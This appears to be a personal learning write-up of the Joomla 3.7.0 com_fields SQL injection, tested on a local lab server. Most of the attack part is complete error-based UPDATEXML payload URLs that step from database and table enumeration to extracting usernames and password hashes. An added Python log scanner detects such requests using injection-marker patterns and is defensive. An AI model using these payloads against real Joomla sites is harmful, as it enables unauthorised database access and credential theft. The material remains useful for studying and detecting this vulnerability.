Joomla 3.7.0 Injection Test Notes

Learning manual injection

Work has mostly calmed down.
Not sure whether there will be a year-end bonus or anything QAQ
Studying the injection in Joomla 3.7.0.

Joomla 3.7.0 injection

As the payload shows, the database error is returned straight away in the response.

http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)


Enumerating the database


http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,22) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x20),1))

Iterate the LIMIT offset with Burp.
The database that looks relevant is joomla370.

Enumerating the tables


http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,22) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6a6f6f6d6c61333730) LIMIT 0,1),0x20),1))

Iterate the LIMIT offset with Burp.
The useful table is o1ldu_users.

Enumerating the columns


http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,22) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6f316c64755f7573657273 AND table_schema=0x6a6f6f6d6c61333730 LIMIT 0,1),0x20),1))

Iterate the LIMIT offset with Burp.
The useful columns are username and password.

Extracting the data

Username

http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,32) FROM joomla370.o1ldu_users ORDER BY password),0x20),1))

Password

http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,32) FROM joomla370.o1ldu_users ORDER BY password),0x20),1))

http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),33,32) FROM joomla370.o1ldu_users ORDER BY password),0x20),1))

Only the two segments joined together give the full password hash: the UPDATEXML error message returns at most 32 characters, which is why the second request starts MID() at offset 33.
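From the defender's side, requests like the ones above are easy to spot in the web server access log, because a legitimate list[fullordering] value is only ever a column name plus ASC/DESC. The following Python scanner is an added example (not part of the original write-up): it flags com_fields requests whose ordering parameter does not match that shape and decodes the MySQL hex literals so an analyst can see which schema or table was being probed. The log lines are constructed samples modelled on the URLs in this post, and the "a.ordering ASC" baseline value is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic), modelled on the
# com_fields requests in this write-up. The first is a benign sort request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) HTTP/1.1" 500 812
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT%20MID((IFNULL(CAST(table_name%20AS%20CHAR),0x20)),1,22)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20(0x6a6f6f6d6c61333730)%20LIMIT%200,1),0x20),1)) HTTP/1.1" 500 812
"""

# A valid ordering value is "<column> [ASC|DESC]"; anything else is suspicious.
LEGIT_ORDERING = re.compile(r"^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$", re.I)
# Extra markers so a value that somehow fits the shape is still caught.
SQLI_MARKERS = re.compile(r"updatexml|extractvalue|information_schema|concat\(|select\s", re.I)
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})", re.I)
REQ_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_hex_literals(payload):
    """Turn MySQL hex strings (0x6a6f6f6d6c61333730) into readable text so the
    analyst sees which schema/table was targeted; single-char separators are dropped."""
    decoded = []
    for h in HEX_LITERAL.findall(payload):
        try:
            s = bytes.fromhex(h).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if s.isprintable() and len(s) > 1:
            decoded.append(s)
    return decoded

def scan_access_log(text):
    """Return one finding per suspicious request: (client ip, payload, decoded hex strings)."""
    findings = []
    for line in text.splitlines():
        m = REQ_LINE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)  # parse_qs percent-decodes values
        for value in query.get("list[fullordering]", []):
            if LEGIT_ORDERING.match(value) and not SQLI_MARKERS.search(value):
                continue
            findings.append((line.split()[0], value, decode_hex_literals(value)))
    return findings

if __name__ == "__main__":
    for ip, payload, decoded in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: {payload[:60]}...  decoded hex literals: {decoded}")
```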

That's all

If you find any mistakes, please contact lanbaidetanlang@qq.com
